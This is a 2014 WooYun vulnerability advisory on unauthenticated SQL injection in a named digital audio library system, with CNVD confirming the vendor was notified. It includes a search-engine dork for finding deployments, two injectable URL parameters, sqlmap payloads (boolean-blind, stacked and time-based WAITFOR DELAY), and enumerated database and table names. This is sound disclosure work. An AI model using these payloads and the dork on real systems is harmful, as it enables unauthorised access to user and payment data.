当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065966

漏洞标题:某通用图书管理系统多处SQL注入(无需登陆)

相关厂商:cncert国家互联网应急中心

漏洞作者: magerx

提交时间:2014-06-26 11:27

修复时间:2014-09-24 11:28

公开时间:2014-09-24 11:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-26: 细节已通知厂商并且等待厂商处理中
2014-06-30: 厂商已经确认,细节仅向厂商公开
2014-07-03: 细节向第三方安全合作伙伴开放
2014-08-24: 细节向核心白帽子及相关领域专家公开
2014-09-03: 细节向普通白帽子公开
2014-09-13: 细节向实习白帽子公开
2014-09-24: 细节向公众公开

简要描述:

RT

详细说明:

前辈们:

 WooYun: 某通用图书馆系统三处sql注入(无需登录) 
 WooYun: 某通用图书馆系统SQL注射漏洞


厂商:
盛大天方有声数字图书馆
搜索:

intitle:天方有声数字图书馆


注入点:

http://target/showContent.aspx?id=6


sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 3626=3626
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=6; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=6 WAITFOR DELAY '0:0:5'--
---
[14:45:01] [INFO] testing Microsoft SQL Server
[14:45:01] [INFO] confirming Microsoft SQL Server
[14:45:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


http://target/user_remark_add.aspx?bookid=2


sqlmap identified the following injection points with a total of 53 HTTP(s) requ
ests:
---
Place: GET
Parameter: bookid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: bookid=12 AND 7717=7717-- sUwa
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: bookid=12; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: bookid=12 WAITFOR DELAY '0:0:5'--
---


漏洞证明:

user:

[14:46:48] [INFO] fetching current user
[14:46:48] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[14:46:48] [INFO] retrieved: NT AUTHORITY\NETWORK SERVICE
current user:    'NT AUTHORITY\\NETWORK SERVICE'


talbe:

[15:28:55] [INFO] fetching database names
[15:28:55] [INFO] fetching number of databases
[15:28:55] [WARNING] running in a single-thread mode. Please consider usage of
ption '--threads' for faster data retrieval
[15:28:55] [INFO] retrieved: 11
[15:28:56] [INFO] retrieved: CNCAudioLib_M
[15:29:01] [INFO] retrieved: CNCAudioLib_SD
[15:29:07] [INFO] retrieved: HyServices02
[15:29:13] [INFO] retrieved: master
[15:29:15] [INFO] retrieved: model
[15:29:18] [INFO] retrieved: msdb
[15:29:20] [INFO] retrieved: Northwind
[15:29:24] [INFO] retrieved: pubs
[15:29:26] [INFO] retrieved: ssreadervideo
[15:29:32] [INFO] retrieved: tempdb
[15:29:34] [INFO] retrieved: TingBookLan
[15:29:39] [INFO] fetching tables for databases: CNCAudioLib_M, CNCAudioLib_SD,
HyServices02, Northwind, TingBookLan, master, model, msdb, pubs, ssreadervideo,
tempdb
[15:29:39] [INFO] skipping system database 'tempdb'
[15:29:39] [INFO] fetching number of tables for database 'TingBookLan'
[15:29:39] [INFO] retrieved: 15
[15:29:40] [INFO] retrieved: dbo.AdminUser
[15:29:46] [INFO] retrieved: dbo.BookTree
[15:29:50] [INFO] retrieved: dbo.BookTreeS
[15:30:15] [INFO] retrieved: dbo.dtproperties
[15:30:21] [INFO] retrieved: dbo.sysconstraints
[15:30:28] [INFO] retrieved: dbo.syssegments
[15:30:32] [INFO] retrieved: dbo.User
[15:30:35] [INFO] retrieved: dbo.user_ips
[15:30:39] [INFO] retrieved: dbo.user_readnums
[15:30:44] [INFO] retrieved: dbo.user_tongji
[15:30:48] [INFO] retrieved: dbo.UserDownLog
[15:30:53] [INFO] retrieved: dbo.UserFavLog
[15:30:57] [INFO] retrieved: dbo.UserListenLog
[15:31:02] [INFO] retrieved: dbo.UserMessageLog
[15:31:07] [INFO] retrieved: dbo.UserRemarkLog
[15:31:12] [INFO] fetching number of tables for database 'CNCAudioLib_SD'
[15:31:12] [INFO] retrieved: 25
[15:31:13] [INFO] retrieved: dbo.AdminUser
[15:31:19] [INFO] retrieved: dbo.BookClass
[15:31:24] [INFO] retrieved: dbo.BookHot
[15:31:26] [INFO] retrieved: dbo.BookPrice
[15:31:33] [INFO] retrieved: dbo.BookTree
[15:31:35] [INFO] retrieved: dbo.BookTreeStat
[15:31:39] [INFO] retrieved: dbo.dtproperties
[15:31:45] [INFO] retrieved: dbo.sysconstraints
[15:31:52] [INFO] retrieved: dbo.syssegments
[15:31:56] [INFO] retrieved: dbo.User
[15:31:59] [INFO] retrieved: dbo.User_Group
[15:32:03] [INFO] retrieved: dbo.user_ips
[15:32:07] [INFO] retrieved: dbo.user_pays
[15:32:10] [INFO] retrieved: dbo.user_readnums
[15:32:15] [INFO] retrieved: dbo.User_ServerType
[15:32:22] [INFO] retrieved: dbo.user_tongji
[15:32:28] [INFO] retrieved: dbo.UserCards
[15:32:33] [INFO] retrieved: dbo.UserFavLog
[15:32:37] [INFO] retrieved: dbo.UserJFLog
[15:32:40] [INFO] retrieved: dbo.UserListenLog
[15:32:45] [INFO] retrieved: dbo.UserLoginLog
[15:32:50] [INFO] retrieved: dbo.UserMes

修复方案:

00

版权声明:转载请注明来源 magerx@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-06-30 22:15

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道向软件生产厂商盛大天方公司通报,电话至010 6561 ****(转天方科技的技术人员),后将通报发送至zrtxs*** 邮箱中。

最新状态:

暂无